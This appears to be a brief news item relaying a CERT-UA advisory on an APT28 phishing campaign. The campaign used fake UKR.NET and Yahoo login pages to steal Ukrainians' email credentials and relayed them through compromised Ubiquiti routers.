CERT-UA, the Ukrainian government’s computer emergency response team, has detected and investigated the spread of phishing attacks by the APT28 hacker group (also known as Pawn Storm, Fancy Bear, BlueDelta) to obtain authentication data of Ukrainians required to log in to public email services.
According to CERT-UA experts, the attackers send HTML files that imitate the web interface of email services (in particular, UKR.NET, Yahoo.com) and implement the technical ability to transmit authentication data entered by the victim via HTTP POST requests. At the same time, the stolen data is transmitted using pre-compromised Ubiquiti devices (EdgeOS).
In June, CERT-UA, in cooperation with Recorded Future, revealed the APT28 (BlueDelta) group’s espionage campaign against Ukrainian organizations.
The governmental Computer Emergency Response Team of Ukraine CERT-UA calls on responsible employees of organizations not to ignore reports of detected signs of anomalous activity and to take immediate measures to reduce the attack surface.